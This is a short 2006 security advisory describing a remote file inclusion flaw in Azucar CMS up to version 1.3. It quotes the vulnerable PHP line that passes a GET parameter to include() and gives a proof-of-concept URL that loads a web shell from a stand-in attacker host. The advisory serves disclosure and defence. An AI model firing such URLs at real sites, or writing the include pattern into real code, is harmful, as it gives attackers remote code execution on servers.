Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability

2006-12-20T00:00:00
ID SECURITYVULNS:DOC:15452
Type securityvulns
Reporter Securityvulns
Modified 2006-12-20T00:00:00

Description

+------------------------------------------------------------------------------------------- + Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability +------------------------------------------------------------------------------------------- + Affected Software .: Azucar CMS <= 1.3 + Download ..........: http://downloads.sourceforge.net/azucarcms/azucarcms1.3.zip + Description .......: "Azucar is a modular content management system designed to be extremely user friendly" + Class .............: Remote File Inclusion + Risk ..............: High (Remote File Execution) + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us> +------------------------------------------------------------------------------------------- + Details: + Azucar CMS admin/index_sitios.php uses the include function insecurely on the $_GET[_VIEW] + paramater passed to the script, a remote file can be specified and executed on the server. + + Vulnerable Code: + admin/index_sitios.php, line(s) 14-15: + -> 14-15: if (isset($_GET[_VIEW])) include($_GET[_VIEW]); + + Proof Of Concept: + http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php +-------------------------------------------------------------------------------------------